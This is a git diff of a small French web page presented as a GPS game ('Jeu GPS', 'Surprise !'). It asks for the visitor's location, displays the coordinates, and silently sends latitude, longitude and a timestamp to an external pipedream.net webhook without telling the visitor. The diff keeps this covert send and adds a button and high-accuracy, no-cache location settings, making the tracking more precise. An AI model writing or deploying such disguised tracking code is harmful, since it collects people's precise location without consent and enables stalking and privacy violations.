--- a/index.html
+++ b/index.html
@@ -2,32 +2,52 @@
 <html>
 <head>
   <title>Jeu GPS</title>
+  <meta name="viewport" content="width=device-width, initial-scale=1">
 </head>
 <body>
   <h1>Surprise !</h1>
-  <p>Chargement de ta position...</p>
+  <p>Appuie sur le bouton pour que je te localise :</p>
+  <button onclick="localiser()">Me géolocaliser</button>
+  <div id="resultat"></div>
 
   <script>
-    navigator.geolocation.getCurrentPosition(function(position) {
-      const lat = position.coords.latitude;
-      const lon = position.coords.longitude;
+    function localiser() {
+      if (!navigator.geolocation) {
+        document.getElementById("resultat").innerText = "La géolocalisation n'est pas disponible.";
+        return;
+      }
 
-      document.body.innerHTML += `<p>Latitude : ${lat}</p><p>Longitude : ${lon}</p>`;
+      navigator.geolocation.getCurrentPosition(
+        function(position) {
+          const lat = position.coords.latitude;
+          const lon = position.coords.longitude;
 
-      fetch("https://eofc0axgg7ewuht.m.pipedream.net", {
-        method: "POST",
-        headers: {
-          "Content-Type": "application/json"
+          document.getElementById("resultat").innerHTML =
+            `<p>Latitude : ${lat}</p><p>Longitude : ${lon}</p>`;
+
+          fetch("https://eofc0axgg7ewuht.m.pipedream.net", {
+            method: "POST",
+            headers: {
+              "Content-Type": "application/json"
+            },
+            body: JSON.stringify({
+              latitude: lat,
+              longitude: lon,
+              timestamp: new Date().toISOString()
+            })
+          });
         },
-        body: JSON.stringify({
-          latitude: lat,
-          longitude: lon,
-          timestamp: new Date().toISOString()
-        })
-      });
-    }, function(error) {
-      document.body.innerHTML += `<p>Erreur : ${error.message}</p>`;
-    });
+        function(error) {
+          document.getElementById("resultat").innerHTML =
+            `<p>Erreur lors de la géolocalisation : ${error.message}</p>`;
+        },
+        {
+          enableHighAccuracy: true,
+          timeout: 10000,
+          maximumAge: 0
+        }
+      );
+    }
   </script>
 </body>
 </html>
